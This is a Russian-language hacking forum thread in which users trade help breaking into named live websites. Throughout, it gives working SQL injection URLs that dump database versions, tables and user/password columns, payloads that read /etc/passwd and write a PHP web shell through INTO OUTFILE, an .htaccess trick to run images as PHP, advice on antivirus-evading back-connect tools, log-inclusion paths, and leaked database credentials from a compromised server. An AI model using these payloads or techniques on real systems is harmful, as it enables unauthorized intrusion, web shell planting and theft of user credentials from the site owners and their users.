Нe и конечно юзер скуль не роот(понятно почему он не читает /etc/passwd), ротового как найти незнаю, у хостера ниче так сайт я дырок ненашел... (mtw.ru)

Есть такой код:
$nomer=$_POST["nomer"];
mysql_query("insert into tb_ref (user,nomer) values ('$user','$nomer')");

К переменной присваиваю значение:
<option value="2') UNION UPDATE tb_users SET password=123 WHERE username=GivioN"); /*
">двойка</option>

Получается такой запрос:
mysql_query("insert into tb_ref (user,nomer) values ('$user','2') UNION UPDATE tb_users SET password=123 WHERE username=GivioN"); /*')"); но он не работает и ошибки нет никакой

Какие данные отправлять в переменной $nomer что бы установить пароль 123 для username=GivioN ?
Магик. квотес в положении off!

ZeroCold
Если mc=on, то шелл через скуль не залить(кроме отдельных часных случаев), запрос на вывод passwd у тебя правильный, если столбец принтабельный, а ничего не выводится, значит скорее всего нет прав

По поводу загрузки файлов. Вариантов очень много, всё зависит от кода, но может получится и так, что обойти его не получится совсем

GivioN
Попробуй почитать что-то. Например про оператор union
http://phpclub.ru/mysql/doc/union.html

Я вижу запрос в адресную строку типа:
http://mihadmin.ru/statpage.php?sid=love

Подставляю вместо нее другой запрос:
http://mihadmin.ru/statpage.php?sid=/.../../../.../etc/passwd

На что система мне выдает:


http://mihadmin.ru/statpage.php?sid=-1' - реагирует с ошибкой.
Но если пытаюсь работать боле глубже
http://mihadmin.ru/statpage.php?sid=-1'+order+by+1/* - столбцы не выводяться

Вообщем, если ли тут иньекция?
Инклуд или скуль?

http://mihadmin.ru/statpage.php?sid=love'+union+select+1,2,concat_ws( 0x3a,version(),database(),user(),@@version_compile _os),4+--+

5.0.51a-24+lenny2:mihadmin_main:mihadmin_main@localhost:de bian-linux-gnu

http://mihadmin.ru/statpage.php?sid=love'+union+select+1,2,group_conc at(0x0b,table_name),4+from+information_schema.tabl es+--+

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
article,
const,
group,
group_refer,
menu,
news,
rights,
rights_refer,
statpage,
user

Jokester, понятно. Вот только не могу найти как объединить 2 команды insert и UPDATE в одном запросе.

и вобще, возможно как нибуть обновить даные в БД с таким уязвимым кодом:
$nomer=$_POST["nomer"];
mysql_query("insert into tb_ref (user,nomer) values ('$user','$nomer')");

Jokester, понятно. Вот только не могу найти как объединить 2 команды insert и UPDATE в одном запросе.

и вобще, возможно как нибуть обновить даные в БД с таким уязвимым кодом:
https://forum.antichat.ru/showthread.php?t=56221
ON DUPLICATE KEY

При прокачанной удаче хакера может сработать, хотя конечно...

А вообще, иньекции в инсерте крутятся, либо через вывод ошибок, либо more1row, так-что расскручивай как обычно

А вообще, иньекции в инсерте крутятся, либо через вывод ошибок, либо more1row, так-что расскручивай как обычно
+ еще метод с временными задержками через sleep() или benchmark()

https://forum.antichat.ru/showpost.php?p=572143&postcount=10 =(

если в переменную вставить это:
2')"); mysql_query("UPDATE tb_users SET password='123' WHERE username='GivioN'"); //

ТО цель будет выполнена. Но не работает так как при отправке пост запроса отредактированного оперой получается такой код:

<select name="nomer">
<option value="1">1 бла бла</option>
<option value="2">2 бла бла</option>
<option value="2')""); mysql_query("UPDATE tb_users SET password='123' WHERE username='GivioN'"); //">3 бла бла</option>
</select><br><br></body></html>

где третье значение имеет двойные ковычки и весь код не отправляется... Как можно надурить систему? Или InetCrack рулит в этом случаи?

https://forum.antichat.ru/showpost.php?p=572143&postcount=10 =(

если в переменную вставить это:


ТО цель будет выполнена. Но не работает так как при отправке пост запроса отредактированного оперой получается такой код:

<select name="nomer">
<option value="1">1 бла бла</option>
<option value="2">2 бла бла</option>
<option value="2')""); mysql_query("UPDATE tb_users SET password='123' WHERE username='GivioN'"); //">3 бла бла</option>
</select><br><br></body></html>

где третье значение имеет двойные ковычки и весь код не отправляется... Как можно надурить систему? Или InetCrack рулит в этом случаи?
В этом случае рулит firefox и tamperdata / hackbar
Редактируя в опере, ты пишешь там фигню - у тебя двойные кавычки 3 раза встречаются, куда это годится?

Да, ребяты, даже не знаю что и сказать :(

Тоесть вот так вот просто, выходим за скобки и кавычки, и выполняем php код, да?
Круто!!!

А что тогда скромничать и mysql_query , выполняй уж что-то посерьёзнее =\

Инновации хек индустрии

В cgi-bin прав на запись нет, заливаю test.pl в произвольную папку, предварительно создав .htaccess c таким содержанием:
Options +ExecCGI
AddHandler cgi-script .pl
Получаю:
Server error

The server encountered an internal error and was unable to complete your request.

Error message:
Premature end of script headers: test.pl

Perl точно установлен.

В чем проблема?

В cgi-bin прав на запись нет, заливаю test.pl в произвольную папку, предварительно создав .htaccess c таким содержанием:

Получаю:


Perl точно установлен.

В чем проблема?


1) chmod +x сделай
2) символы перевода строки "\n", а не "\r\n"

попугай
\r\n заменил на \n, права 755 и так стоят. Ошибка та же.

попугай
\r\n заменил на \n, права 755 и так стоят. Ошибка та же.


значит Options нельзя использовать. Глянь в error_log

К логам доступа нет. А Options все таки работают, т.к. без .htaccess файлы *.pl выдаются просто на скачивание.

проблема скорее всего именно в нехватке прав, попробуй найти что-нибудь кроме /var/www/cgi-bin

что-нибудь вроде

locate default

и попробовать поискать что-то такое:

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

может быть не только из /var/www/cgi-bin можно выполнять

проблема скорее всего именно в нехватке прав
Так через perl test.pl все работает, так что, думаю, не в правах дело.
попробуй найти что-нибудь кроме /var/www/cgi-bin
Нет, нету. Да и каталог-то, в который я могу писАть, всего один.

http://ashtarakkat.com/en/products/showProduct/63/
и зделаю так..

http://ashtarakkat.com/en/products/showProduct/63%27
скаjите поjaлуста ето sql ??

и как зделать ??

Так через perl test.pl все работает, так что, думаю, не в правах дело.

Нет, нету. Да и каталог-то, в который я могу писАть, всего один.

не путай perl test.pl и запуск perl-скрипта из веба, абсолютно разные вещи.

PS: perl test.pl будет работать в любых .*nix, если админ не изврашенец

Так через perl test.pl все работает, так что, думаю, не в правах дело.

Нет, нету. Да и каталог-то, в который я могу писАть, всего один.
А зачем тебе вообще перловый вебшелл? Не хватит обычного перлового бекконнекта, а затем уже ручками полазить/посмотреть?

ручками полазить/посмотреть
Ручками я и сейчас могу через passthru(), но на это уйдет много времени. ls, cat и т.д. - это, конечно, гибко, но не удобно.

Подскажите можно ли здесь подобрать:

http://www.qatardevbank.com/ar/viewsubs.php?id=-2+order+by+5+--+

http://www.qatardevbank.com/ar/viewsubs.php?id=(select+1+from+(select+count(0),co ncat((select+version()),floor(rand(0)*2))+from+(se lect+1+union+select+2+union+select+3+union+select+ 3+union+select+3+union+select+3+union+select+3+uni on+select+3+union+select+3+union+select+3+union+se lect+3+union+select+3+union+select+3)x+group+by+2+ limit+1)a)+--+

http://www.qatardevbank.com/ar/viewsubs.php?id=-2+and+(select*from(select+count(*)from(select+1+un ion+select+2+union+select+3)x+group+by+concat(mid( (select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+ limit+1,1),1,64),floor(rand(0)*2)))z)+--+

Подскажите можно ли здесь подобрать:

http://www.qatardevbank.com/ar/viewsubs.php?id=-2+order+by+5+--+

http://www.qatardevbank.com/ar/viewsubs.php?id=(select+1+from+(select+count(0),co ncat((select+version()),floor(rand(0)*2))+from+(se lect+1+union+select+2+union+select+3+union+select+ 3+union+select+3+union+select+3+union+select+3+uni on+select+3+union+select+3+union+select+3+union+se lect+3+union+select+3+union+select+3)x+group+by+2+ limit+1)a)+--+

http://www.qatardevbank.com/ar/viewsubs.php?id=-2+and+(select*from(select+count(*)from(select+1+un ion+select+2+union+select+3)x+group+by+concat(mid( (select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+ limit+1,1),1,64),floor(rand(0)*2)))z)+--+


http://www.qatardevbank.com/ar/viewsubs.php?id=-2+or+1=1+and+substring(version(),1,1)=4


для начала

ZeroCold
Если mc=on, то шелл через скуль не залить(кроме отдельных часных случаев), запрос на вывод passwd у тебя правильный, если столбец принтабельный, а ничего не выводится, значит скорее всего нет прав

По поводу загрузки файлов. Вариантов очень много, всё зависит от кода, но может получится и так, что обойти его не получится совсем

Да кавычки фунициклируют, ну да столбец принтабельный таким методом выудил пас и лог от админки, правда по очереди, т.е. в два запроса каждый раз обрашаясь только к первому столбцу за один запрос неполучалось, скуль 4.18, покрайней мере так н мап сказал, другим способом не узнавалось.
Что касается загрузчика то даже не представляю как он выглядит, в смысле его код, на всей странице есть только ява
<!-- 3function MM_jumpMenu(targ,selObj,restore){ //v3.0 4 eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'"); 5 if (restore) selObj.selectedIndex=0; 6} 7//-->
но что то мне подсказывает отношения к загрузке это не имеет. :)
Что касается самой конопки загрузки то фаер баг очень скупо о ней отзываеться
<input type="file" name="img_mini"> - об окне ввода пути откуда загружать
<input type="submit" value="Вставить файлы" id="files" name="files"> - собственно кнопка заливки. Есть идеи как это можно проэксплуатировать? )

Да, ребяты, даже не знаю что и сказать :(

Тоесть вот так вот просто, выходим за скобки и кавычки, и выполняем php код, да?
Круто!!!

Получается да. Проверил на локалке все работает


А что тогда скромничать и mysql_query , выполняй уж что-то посерьёзнее =\

А чего тогда скуль раскручивать в гет запросах, хеши какие-то пытаться вытягивать? Не... я просто новичек, может опять чего-то не понимаю


Инновации хек индустрии

Это цветочки... Уже есть идеи как магик.квотес обходить.

Проверил на локалке все работает

А, ну тогда нормально, ты хакер

Это цветочки... Уже есть идеи как магик.квотес обходить.

Да не запаривайся ты. Раз у тебя на локалке работает то, что ты показывал, ломай интырнеты!

Ну сам подумай, вот допустим код:

$id = $_GET['id'];
echo "$id";

А ты его вот так :
test.php?id=1']; system('ls -la'); // пыщ-пыщ!111

Если тот пример работает, то почему-бы этому не сработать?

Grey: даже особые обстоятельства Пашкелы не сравнятся с новым методом ^_^

А, ну тогда нормально, ты хакер
Классно!!! А я думал хакеров нету :)


Если тот пример работает, то почему-бы этому не сработать?

ну да... с гетами это не работает, наверно потому что кодировка менется, хотя вам лучше знать

http://ashtarakkat.com/en/products/showProduct/63/
и зделаю так..

http://ashtarakkat.com/en/products/showProduct/63%27
скаjите поjaлуста ето sql ??

и как зделать ?

Вопрос знатокам: есть форум ибф Powered by*Invision Power Board(U) v1.3 Final © 2003 *IPS, Inc.
Русский Модифицированный IPB v1.3 Final © 2003*BesTFileZ.Net*&*IBR Team*.Через скулю нашел хеш админа, выполняю вход, и потом когда хочу зайти в админку мне помимо пароля просит ввести еще личный код админа.Собственно и сам вопрос где в базе хранитыса данный код? и если хранится он в базе.

Вопрос знатокам: есть форум ибф Powered by*Invision Power Board(U) v1.3 Final © 2003 *IPS, Inc.
Русский Модифицированный IPB v1.3 Final © 2003*BesTFileZ.Net*&*IBR Team*.Через скулю нашел хеш админа, выполняю вход, и потом когда хочу зайти в админку мне помимо пароля просит ввести еще личный код админа.Собственно и сам вопрос где в базе хранитыса данный код? и если хранится он в базе.

Тоже встречал такое.. Админы ставлят на админку еще бейс авторизацию и зачастую логин и пасс находится НЕ в бд. Если FILE_PRIV: Y , то читай файлы админки

:.']Тоже встречал такое.. Админы ставлят на админку еще бейс авторизацию и зачастую логин и пасс находится НЕ в бд. Если FILE_PRIV: Y , то читай файлы админки
вот именно что нет там бейс авторизации, просто еще одно поле добавилось в логинилке...

Скопируй точно какой код просит (и еще его id из сорса странички) и дай имя файла из адресной строки, а также имя файла, куда форма будет стучаться.

да обычная логинилка в админку форума, только еще поле куда личный код админа надо вводить помимо пароля
<form action='http://forum.site.ru/admin.php?adsess=' method='post' name='theAdminForm' > <input type='hidden' name='adsess' value=''> <input type='hidden' name='login' value='yes'><div class='tableborder'> <div class='maintitle'>Требование авторизации</div> <table width='100%' cellspacing='0' cellpadding='5' align='center' border='0'><tr> </tr> <tr> <td class='tdrow1' width='40%' valign='middle'>Ваше имя:</td> <td class='tdrow2' width='60%' valign='middle'><input type='text' style='width:100%' name='username' value='Libra'></td> </tr> <tr> <td class='tdrow1' width='40%' valign='middle'>Ваш пароль:</td> <td class='tdrow2' width='60%' valign='middle'><input type='password' style='width:100%' name='password' value=''></td> </tr> <tr> <td class='tdrow1' width='40%' valign='middle'>Ваш личный код:</td> <td class='tdrow2' width='60%' valign='middle'><input type='password' style='width:100%' name='ppassword' value=''></td> </tr> <tr><td align='center' class='pformstrip' colspan='2' ><input type='submit' value='Войти' id='button' accesskey='s'></td></tr> </form></table></div><br />

да обычная логинилка в админку форума, только еще поле куда личный код админа надо вводить помимо пароля
Вот видишь, как помогло!

http://forums.ibresource.ru/index.php?act=Print&client=printer&f=30&t=6657

Мотай до первого упоминания "ppassword".
Как видно, этот дополнительный код забит в самом файле, поэтому без возможности чтения файлов на серваке ты его не узнаешь.

да уже сам вкурил что к чему...тот же форум почитал...читалка не робит , так что шансы на заливку шелла урезались очень сильно.Но в любом случае спасибо большое з аоказанную помосйь и потерянное время.

Хочу применить всем ивестную дыру в vbseo 3.3.2 (инклуд). Но столкнулся с проблемов. Когда хочу поставить картинку с шеллом себе на аватар пишет:

Пределы измерений для этого типа файла составляют 100 на 100. Мы не можем уменьшить ваш файл, поэтому сделайте это самостоятельно и загрузите снова. Сейчас размеры вашего файла составляют 8236 на 8230.

хотя и размеры правильные и все остальное.

Как решить эту проблему?

Через что можно сделать back connect кроме netcat. Net cat не подходит, т.к. палится антивирусом.
Читал что можно через netwox но так и не разобрался как. Знающие подскажите!

Есть альтернативная версия netcat (просто заново скомпилированная - она не детектится). Еще есть mocat. Поищи в гугле.

Помогите please докрутить скуль

http://www.nnovia.com/products.php?id=31%20and%201=2

http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5

Blind MYsql system information:
----------------------------------
@@basedir: /
@@tmpdir: /tmp/
database(): nnovia3_osc1
@@version_compile_os: pc-linux-gnu
version(): 5.0.89-community
@@datadir: /var/lib/mysql/
user(): nnovia3_osc1@localhost

http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5

Blind MYsql system information:
----------------------------------
@@basedir: /
@@tmpdir: /tmp/
database(): nnovia3_osc1
@@version_compile_os: pc-linux-gnu
version(): 5.0.89-community
@@datadir: /var/lib/mysql/
user(): nnovia3_osc1@localhost


а таблицы с юзверями там всеравно нет.....

2 Pashkela thanks.

Я ввожу твою строку

http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5

и на экране ничего не выводится. или эта конструкция работает только с тулзой?

Pashkela thanks.

а от чего зависит
+and+substring(version(),1,1)=3
+and+substring(version(),1,1)=4
или?
+and+substring(version(),1,1)=5

От того, какая версия мускула стоит.

может кто поможет и подскажет как раскрутить....
получен доступ к password а к login нет
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+all+select+aes_decrypt(aes_encry pt(group_concat(pwd,0x3a+SEPARATOR+0x0b),0x71),0x7 1),2,3,4,5+from+users--
решил использовать load_file('/etc/passwd')
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+all+select+load_file(0x2f6574632 f706173737764),2,3,4,5+from+users--
получил права на чтение файлов
/home/
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+all+select+load_file(0x2f686f6d6 52f),2,3,4,5+from+users--
а вот в дальнейших деррикториях я запутался

Да кавычки фунициклируют, ну да столбец принтабельный таким методом выудил пас и лог от админки, правда по очереди, т.е. в два запроса каждый раз обрашаясь только к первому столбцу за один запрос неполучалось, скуль 4.18, покрайней мере так н мап сказал, другим способом не узнавалось.
Что касается загрузчика то даже не представляю как он выглядит, в смысле его код, на всей странице есть только ява
<!-- 3function MM_jumpMenu(targ,selObj,restore){ //v3.0 4 eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'"); 5 if (restore) selObj.selectedIndex=0; 6} 7//-->
но что то мне подсказывает отношения к загрузке это не имеет. :)
Что касается самой конопки загрузки то фаер баг очень скупо о ней отзываеться
<input type="file" name="img_mini"> - об окне ввода пути откуда загружать
<input type="submit" value="Вставить файлы" id="files" name="files"> - собственно кнопка заливки. Есть идеи как это можно проэксплуатировать? )
Вопрос все еще актуален, нужны свежие идеи ))

в скуле фильтруются () как обойти? хексил, 0х28 0х29 не помогает.какие предложения?

в скуле фильтруются () как обойти? хексил, 0х28 0х29 не помогает.какие предложения?
обходиться без функций и подзапросов, кеп ! или попробывать заюзать более продвинутую кодировку %28 %29

Пытаюсь раскрутить site.com/search_result.php?(куча параметров)&country=13+order+by+1/*

Выплевовает ошибку

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/public_html/search_result.php on line 474
SELECT Profiles.ID, Headline, Country, Occupation, City, Sex, Sex2, ProfileType, NickName, Children, LEFT( DescriptionMe, 180 ) AS DescriptionMe, LEFT( DescriptionYou, 100 ) AS DescriptionYou, DateOfBirth, DateOfBirth2, Pic_0_addon, ExtraAddons, Sound, (LastNavTime > SUBDATE(NOW(), INTERVAL 5 MINUTE)) as is_onl FROM Profiles WHERE is_spamer <> '2' AND (LookingFor = 'female' OR LookingFor = 'both') AND (IF('both'='both' or 'both'='couple',1,Sex='both')) AND (IF('both'='couple',ProfileType='couple',ProfileTy pe!='couple')) AND (TO_DAYS(DateOfBirth) BETWEEN TO_DAYS('1934-04-06') AND (TO_DAYS('1992-04-06')+1)) AND (Country IN (-1,13 order by 1/*)) AND Status = 'Active' ORDER BY Priority DESC, Priority DESC, Profiles.LastLoggedIn DESC LIMIT 0, 15

Как обойти? Я новичек, посоветуйте плз.

Пытаюсь раскрутить site.com/search_result.php?(куча параметров)&country=13+order+by+1/*

Выплевовает ошибку



Как обойти? Я новичек, посоветуйте плз.

&country=-1)) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

и на всякий случай

&country=-1)) and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

&country=-1)) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

и на всякий случай

&country=-1)) and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

budden пробовал закрывать скобки уже, не катит.and 1=0 тут не причём, тем более если &country=-1, можно просто 99999999 или +limit+1,1 (так тоже принтабельные можно вывести) но не в этом случае. Т.к. поля подобрать всё равно не представлется возможным. Подзапросы юзать наверное тоже не выйдет, я просто не пойму как обрезать запрос...

Не могу найти админку: http://www.yellowbulletin.com/

MS SQL

сканером: security-digger.org
не получается.

Не могу найти админку: http://www.yellowbulletin.com/

вроде http://www.yellowbulletin.com/cp/ но чета белое все

есть возможность залить htaccess через админ-панель. как сделать так, чтобы сервер воспринимал gif-картинки как php-скрипты ?

есть возможность залить htaccess через админ-панель. как сделать так, чтобы сервер воспринимал gif-картинки как php-скрипты ?
AddType application/x-httpd-php .gif

Как думаете, реально раскрутить?
http://starosti.ru/archive.php?m=10&y=1909'

Скажите от чего зависит цифра в имени ссылки на лог апача?
/proc/self/fd/2
/proc/self/fd/11

мне нужно чтоб при инклуде сразу добраться до логов.

Не могу найти админку: http://www.yellowbulletin.com/

MS SQL

сканером: security-digger.org
не получается.
http://www.yellowbulletin.com/backup/
смотрите, может есть че нить ценное!

Скажите от чего зависит цифра в имени ссылки на лог апача?
/proc/self/fd/2
/proc/self/fd/11

мне нужно чтоб при инклуде сразу добраться до логов.


Это ярлыки.
Логам апача вроде соответствуют 2 или 7.

Как насчет идеи провести пен-тест обхода mysql_escape_string и htmlspecialchar с использованием многобайтных кодировок. Развеевание в паблике мифа в реальность! Если да, то многие двиги можна скомпроментировать (искажение данный или експлуатация разных уязвимостей!). Смотрю здесь сегодня собрание)

Как насчет идеи провести пен-тест обхода mysql_escape_string и htmlspecialchar с использованием многобайтных кодировок. Развеевание в паблике мифа в реальность! Если да, то многие двиги можна скомпроментировать (искажение данный или експлуатация разных уязвимостей!). Смотрю здесь сегодня собрание)


Тесть:
(эта функция уже не рекомендуется к использованию, а функция mysql_real_escape_string проверяет кодировку текущего соединения, так что у неё меньше проблем с подобным уязвимостями.)
/* {{{ proto string mysql_escape_string(string to_be_escaped)
Escape string for mysql query */
PHP_FUNCTION(mysql_escape_string)
{
char *str;
int str_len;

if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {
return;
}

/* assume worst case situation, which is 2x of the original string.
* we don't realloc() down to the real size since it'd most probably not
* be worth it
*/

Z_STRVAL_P(return_value) = (char *) safe_emalloc(str_len, 2, 1);
Z_STRLEN_P(return_value) = mysql_escape_string(Z_STRVAL_P(return_value), str, str_len);
Z_TYPE_P(return_value) = IS_STRING;

if (MySG(trace_mode)){
php_error_docref("function.mysql-real-escape-string" TSRMLS_CC, E_DEPRECATED, "This function is deprecated; use mysql_real_escape_string() instead.");
}
}
/* }}} */

Скажите от чего зависит цифра в имени ссылки на лог апача?
/proc/self/fd/2
/proc/self/fd/11

мне нужно чтоб при инклуде сразу добраться до логов.


Это ярлыки.
Логам апача вроде соответствуют 2 или 7.



Не всегда есть доступ к логам таким образом же.

ну когда есть .как узнать какая цифра и на какой лог ссылается ссыока

ну когда есть .как узнать какая цифра и на какой лог ссылается ссыока

последовательно, цифра за цифрой.

отчего зависит цифра?
на какой лог ссылается ссыока?

Народ.. тут Слепая MySQL injection 5'тая Версия...
_http://lubernet.su/clients/?do=cat&category=%28select+1+from+%28select+count%280%29,c oncat%28%28select+table_name+from+information_sche ma.tables+limit+0,1%29,floor%28rand%280%29*2%29%29 +from+information_schema.tables+group+by+2+limit+0 ,1%29a%29--+
и не идет.. помогите плиз!

так щас пишет что Сайт временно отключен
наверное попалили

так щас пишет что Сайт временно отключен
наверное попалили
нет так он и есть.. там 100% есть уязвимость

Залил на один ресурс шелл от madneta
прочитал файл msql-конфиг внём такая инфа

objconn.Open "Provider=SQLOLEDB;Data Source=(Local);INITIAL Catalog=POKER; User Id=sa;Password=sas;"
objconn.Open "Provider=SQLOLEDB;Data Source=(Local);INITIAL Catalog=POKER; User Id=sa;Password=ichsss;"

Мне нужно слить базу логинов и пассов. Пытаюсь приконектиться к базе через шелл, localhost
используя: логин: sa пасс:sas - не конектится, ошибка
логин=sa;Password=ichsss - тоже самое

попробывал зайти в каталог: С/msql_data_files/
там лежат папки баз от других сайтов на этом хосте но папки POKER нет (
В админку не залогиниться т.к. админ переименовал файл админки а в корневой папке ~500 файлов.
Что посоветуете господа? Очень нужно слить базу, help somebody
(новичок)

попробуй http://sourceforge.net/projects/phpmsadmin/files/

ну когда есть .как узнать какая цифра и на какой лог ссылается ссыока

Вобщем так, для ясности и на глядности что и где:

Можешь посмотреть сначала на /proc/self/status на значение pid, если ты не понял то self ето ссылка на етот пид, обращайся на /proc/цыфра_которой_соответствуе т_pid/2, а там уже

ls -la /proc/цыфра_которой_соответствуе т_pid/fd/
итого 0
dr-x------ 2 apache apache 0 2010-04-07 14:04 ./
dr-xr-xr-x 7 apache apache 0 2010-04-07 13:56 ../
lr-x------ 1 apache apache 64 2010-04-07 14:04 0 -> /dev/null
l-wx------ 1 apache apache 64 2010-04-07 14:04 1 -> /dev/null
l-wx------ 1 apache apache 64 2010-04-07 14:04 2 -> /var/log/httpd/error_log

ссылка на логи, а проинклудишь или нет, зависит от прав.:(

UPD
Кстате ты интересовался именно цыфрой, она от одмина не зависит, зависит только от количества логов который использует апач. Если хостинг апач с под пользоваетлся, на огромном хостинге то попадешь на 2, если с под апача туева куча то будешь искать, как подсказывает опыт.

подобрал на сайте баблицу с логинами и пассами
http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,group_concat(column_name)+from+in formation_schema.columns+where+table_name=0x706870 62625f7573657273--
назнаю как извлечь user_id,username,user_password

http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3b,user_id,username,u ser_password)+from+information_schema.tables--
вот так не получается(((((( подскажите пожалуйста!!! с меня +++ !!!

подобрал на сайте баблицу с логинами и пассами
http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,group_concat(column_name)+from+in formation_schema.columns+where+table_name=0x706870 62625f7573657273--
назнаю как извлечь user_id,username,user_password

http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3b,user_id,username,u ser_password)+from+information_schema.tables--
вот так не получается(((((( подскажите пожалуйста!!! с меня +++ !!!
Тебе надо user_id, username и user_password тащить не из information_schema.tables, а из таблицы, которую ты указал в первом запросе

http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3b,user_id,username,u ser_password)+from+0x70687062625f7573657273--

Делаю не получается =\ подскажите как правильно смотреть содержимое столбцов таблиц

_http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3a,username,user_pass word)+from+phpbb_users+limit+86,1--+

я через админку залил шелл, прохожу по ссылке и вижу "500. Внутренняя ошибка". Либо с правами на директорию что-то, либо с htaccess. Что посоветуете ?

http://www.datemefree.org/guestbook.php?to=-124926+order+by+1/*
Не могу никак подобрать поля, не обрезается запрос.

я через админку залил шелл, прохожу по ссылке и вижу "500. Внутренняя ошибка". Либо с правами на директорию что-то, либо с htaccess. Что посоветуете ?


попробовать выйти за пределы папки, куда заливаешь (залить в другую)

попробовать выйти за пределы папки, куда заливаешь (залить в другую)
так а как ? там всё автоматом заливается в папку img

Помогите найти админку: http://www.qatofin.com.qa/en/

Сканером только это удалось найти:

http://www.qatofin.com.qa/cgi-bin/ HTTP 403 Forbidden
http://www.qatofin.com.qa/en/ HTTP 200 OK
http://www.qatofin.com.qa/icons/ HTTP 200 OK
http://www.qatofin.com.qa/icons/ HTTP 200 OK
http://www.qatofin.com.qa/phpmyadmin HTTP 403 Forbidden

http://www.google-store.com/index.php?cPath=-23+union+select+1

поXакаем google? ;)

FlaktW http://www.qatofin.com.qa/en/admin/login.php

ребят есть сервер,у меня тут контроль на 100% ,качал все скрипты, сдампил базу

что еще можно сделать :D ??

ftp доступ тоже есть :)

захватить локальную сеть ?

захватить локальную сеть ?

и как это реализовать? :)

Помогите залить шелл, а то что-то не получаеться
пробовал
http://www.casinophiles.com/news.php?id=-1301+UNION+SELECT+1,'%3C?%20system($_GET[''cmd''])%20?%3E',3,4,5+FROM+'extra'+into+outfile+'/www/179/www.casinophiles.com/img.php'--
и
http://www.casinophiles.com/news.php?id=-1301+UNION+SELECT+0x3C3F20706870696E666F28293B203F 3E,2,3,4,5+FROM+extra.software+INTO+DUMPFILE+'/www/179/www.casinophiles.com/img.php'--

немогу понять в чом проблема!!

Помогите залить шелл, а то что-то не получаеться
пробовал
http://www.casinophiles.com/news.php?id=-1301+UNION+SELECT+1,'%3C?%20system($_GET[''cmd''])%20?%3E',3,4,5+FROM+'extra'+into+outfile+'/www/179/www.casinophiles.com/img.php'--
и
http://www.casinophiles.com/news.php?id=-1301+UNION+SELECT+0x3C3F20706870696E666F28293B203F 3E,2,3,4,5+FROM+extra.software+INTO+DUMPFILE+'/www/179/www.casinophiles.com/img.php'--

немогу понять в чом проблема!!


прав не хватает на запись в папку эту

и как это реализовать? :)
например http://forum.antichat.ru/showthread.php?p=978803

попугай, а что можешь подсказать??
есть ещо папка /flags/

например http://forum.antichat.ru/showthread.php?p=978803

спасибо, попробую

Не могу разобраться с wso шеллом
залил его на сайт а phpadmin лежит в папке c:interpub/www/phpadmin
нужно его скопировать в c:interpub/site.com/
выбираю папку ставлю галку выбираю скопировать а конечный путь куда копировать
не появляется?
есть меню Execute: может можно командой написать, там windows nt стоит
повсякому пробывал, через шелл madneta не создаёт папки
Помогите бедному студенту заработать на пиво please
осталось только слить базу

А через wso что ли не слить базу? ояебу

.Slip не конектится через wso не могу поять почему выходит ошибка
скопировал phpadmin выходит такая ошибка

Cannot load mysql extension. Please check your PHP configuration. - Documentation

на хосте размещаются ещё несколько сайтов на некоторых есть пхпадмин захожу туда - точно такая же ошибка ... Что может это может быть?

сори за глупый вопрос, но вот пытаюсь залить шелл вот так:
detalle.php?id=-1+union+select+0x3C3F73797374656D28245F4745545B222 0636D64225D293B3F3E,2,3,4,5,6+into+outfile+'/home/site/html/shell.php'--

3C3F73797374656D28245F4745545B2220636D64225D293B3F 3E -- это я захексил <?system($_GET[cmd]);?>

проблема в том что кавычки в этом месте слешируются '/home/site/html/shell.php' что можно сделать?

сори за глупый вопрос, но вот пытаюсь залить шелл вот так:
detalle.php?id=-1+union+select+0x3C3F73797374656D28245F4745545B222 0636D64225D293B3F3E,2,3,4,5,6+into+outfile+'/home/site/html/shell.php'--

3C3F73797374656D28245F4745545B2220636D64225D293B3F 3E -- это я захексил <?system($_GET[cmd]);?>

проблема в том что кавычки в этом месте слешируются '/home/site/html/shell.php' что можно сделать?

Если maqic_quotes включен, то никак. Есть один вариант, через двойные запросы, вроде бы Scipio писал.
Но сомневаюсь, что ты понимаешь что это такое и как это реализовать, потому что вопрос действитеьно глупый.

Не могу найти админку: http://www.ehealth2008.si/index.php

Сканер только это нашел:

http://www.ehealth2008.si/images/ HTTP 200 OK
http://www.ehealth2008.si/src/ HTTP 200 OK
http://www.ehealth2008.si/stats/ HTTP 401 Authorization Required
http://www.ehealth2008.si/server-status/ HTTP 403 Forbidden
http://www.ehealth2008.si/about.php HTTP 200 OK
http://www.ehealth2008.si/icons/ HTTP 200 OK
http://www.ehealth2008.si/index.php HTTP 200 OK
http://www.ehealth2008.si/src/ HTTP 200 OK
http://www.ehealth2008.si/style.css HTTP 200 OK
http://www.ehealth2008.si/cgi-bin/ HTTP 403 Forbidden

Помогите, плиз.

